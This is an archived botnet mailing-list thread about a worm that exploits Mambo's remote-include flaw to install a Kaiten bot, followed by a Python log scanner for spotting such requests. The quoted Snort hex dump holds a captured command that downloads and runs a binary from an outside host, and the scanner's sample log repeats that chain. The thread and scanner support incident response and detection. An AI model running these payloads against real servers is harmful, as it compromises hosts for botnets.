To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
I monitored LordNikon earlier this year; an extract of activity can be found here:
http://www.ecs.soton.ac.uk/~cet/kxx.txt

Chas
________________________________
From: PinkFreud [mailto:[EMAIL PROTECTED]]
Sent: Tue 07/03/2006 22:15
To: [email protected]
Subject: Re: [botnets] web remote include path

LordNikon is a serial offender. The worm you're seeing there typically downloads a shell script, which in turn downloads precompiled copies of the worm and a Kaiten bot. I've only seen them compiled for Linux, though I know he's snagged a few FreeBSD systems in the past (presumably using the Linux compatibility layer). LordNikon has claimed in the past that the bots aren't for his use, except to sell to someone else.

These are *nix machines, and the webserver user is typically not root - hence, the worm only uses the webserver account. If the machine is restarted, or the worm + bot processes otherwise killed, they shouldn't be able to restart, in theory. In practice, though, the script is stupid, which tends to cause an interesting problem: even if the distribution server goes down, other compromised machines will wind up attempting to reinstall the worm + bot. As you might have noticed, when LordNikon does a run, you get a LOT of hits from the worm running on numerous machines. If the script, worm, and bot still exist (he usually dumps them in /tmp, though I think he's started using /tmp/a at some point), the script will run, and although it'll fail to download the worm and bot, it'll still execute the existing copies, which brings the bot back to life. This also means that any given compromised server may have several instances of the bot running on it - the longer the worm spreads, the more copies it's likely to have running.

Note that LordNikon is Romanian. Good luck trying to get him shut down.

On Tue, Mar 07, 2006 at 02:59:42PM +0100, bodik babbled thus:
> hi,
>
> this list seems to be for white Jedi ;) so I'll add my contribution.
> Even with low experience I believe I found a botnet through a snort report
> about WEB remote include path:
>
> #(8 - 452097) [2006-03-07 08:20:04] [local/2002] [snort/2002] WEB-PHP
> remote include path
> IPv4: 194.249.251.5 -> XXX.XXX.X.XX
> hlen=5 TOS=0 dlen=360 ID=23207 flags=0 offset=0 TTL=49 chksum=38897
> TCP: port=44448 -> dport: 80 flags=***AP*** seq=6723088
> ack=1590922881 off=5 res=0 win=5840 urp=0 chksum=17886
> Payload: length = 320
>
> 000 : 47 45 54 20 2F 63 76 73 2F 6D 61 6D 62 6F 2F 69 GET /cvs/mambo/i
> 010 : 6E 64 65 78 32 2E 70 68 70 3F 5F 52 45 51 55 45 ndex2.php?_REQUE
> 020 : 53 54 5B 6F 70 74 69 6F 6E 5D 3D 63 6F 6D 5F 63 ST[option]=com_c
> 030 : 6F 6E 74 65 6E 74 26 5F 52 45 51 55 45 53 54 5B ontent&_REQUEST[
> 040 : 49 74 65 6D 69 64 5D 3D 31 26 47 4C 4F 42 41 4C Itemid]=1&GLOBAL
> 050 : 53 3D 26 6D 6F 73 43 6F 6E 66 69 67 5F 61 62 73 S=&mosConfig_abs
> 060 : 6F 6C 75 74 65 5F 70 61 74 68 3D 68 74 74 70 3A olute_path=http:
> 070 : 2F 2F 32 30 34 2E 38 33 2E 35 36 2E 31 34 34 2F //204.83.56.144/
> 080 : 63 6D 64 2E 67 69 66 3F 26 63 6D 64 3D 63 64 25 cmd.gif?&cmd=cd%
> 090 : 32 30 2F 74 6D 70 3B 77 67 65 74 25 32 30 32 30 20/tmp;wget%2020
> 0a0 : 34 2E 38 33 2E 35 36 2E 31 34 34 2F 67 69 63 75 4.83.56.144/gicu
> 0b0 : 70 6F 3B 63 68 6D 6F 64 25 32 30 37 34 34 25 32 po;chmod%20744%2
> 0c0 : 30 67 69 63 75 70 6F 3B 2E 2F 67 69 63 75 70 6F 0gicupo;./gicupo
> 0d0 : 3B 65 63 68 6F 25 32 30 59 59 59 3B 65 63 68 6F ;echo%20YYY;echo
> 0e0 : 7C 20 20 48 54 54 50 2F 31 2E 31 0A 48 6F 73 74 | HTTP/1.1.Host
> 0f0 : 3A 20 31 34 37 2E 32 32 38 2E 34 2E 32 30 0A 55 : XXX.XXX.X.XX.U
> 100 : 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C ser-Agent: Mozil
> 110 : 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 la/4.0 (compatib
> 120 : 6C 65 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 le; MSIE 6.0; Wi
> 130 : 6E 64 6F 77 73 20 4E 54 20 35 2E 31 3B 29 0A 0A ndows NT 5.1;)..
>
> The compiled bot downloaded through the propagated script is trying to contact
> servers at:
> * irc.ridernet.org:6667
> * 12.205.151.144:6667
>
> bodik

--
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net

Unsolicited advertisements sent to this address are NOT welcome.
_______________________________________________
botnets mailing list
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
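As an added example (my code, not anything posted in this thread): a Python check that flags Mambo-style remote-include attempts like the one in bodik's Snort alert by parsing Apache access-log lines, and lists the shell fragments carried in the cmd= argument so a defender can see what the request tried to run. The parameter names come from the quoted payload; the log lines and IP addresses are constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Parameters the quoted Mambo request abuses to make index2.php include a
# remote file; a URL value in any of them is treated as an include attempt.
RFI_PARAMS = ("mosConfig_absolute_path", "GLOBALS")
# Fragments of the cmd= argument seen in the Snort payload (fetch, chmod, run from /tmp).
SHELL_MARKERS = ("wget", "chmod", "/tmp", ";./")

# Apache common/combined log format: client ip ... "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample lines (documentation-range IPs, not the thread's hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Mar/2006:08:20:04 +0100] "GET /cvs/mambo/index2.php'
    '?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path='
    'http://198.51.100.9/cmd.gif?&cmd=cd%20/tmp;wget%20198.51.100.9/x;chmod%20744%20x;./x'
    ' HTTP/1.1" 200 1234',
    '203.0.113.8 - - [07/Mar/2006:08:21:10 +0100] "GET /index2.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Mar/2006:08:22:31 +0100] "GET /redirect.php?url=http://example.org/ HTTP/1.1" 302 0',
]

def parse_query(query):
    """Split on '&' only: the payload uses ';' as a shell separator, not a query separator."""
    params = []
    for part in query.split("&"):
        key, _, value = part.partition("=")
        params.append((unquote_plus(key), unquote_plus(value)))
    return params

def classify(line):
    """Return details of a remote-include attempt in one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_query(urlsplit(m["target"]).query)
    for key, value in params:
        # GLOBALS[...] style keys count too, so compare the bare name before any '['.
        if key.split("[")[0] in RFI_PARAMS and value.lower().startswith(("http://", "https://", "ftp://")):
            cmd = dict(params).get("cmd", "")
            return {"client": m["ip"], "param": key, "status": int(m["status"]),
                    "include_host": urlsplit(value).hostname,
                    "shell_markers": [s for s in SHELL_MARKERS if s in cmd]}
    return None

def scan(lines):
    """Run classify() over an iterable of log lines and keep the hits."""
    return [hit for hit in map(classify, lines) if hit]
```

A 200 status on a flagged line is the case worth chasing first, since the include may have succeeded; the redirect.php line shows that a URL in an unrelated parameter is not flagged.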
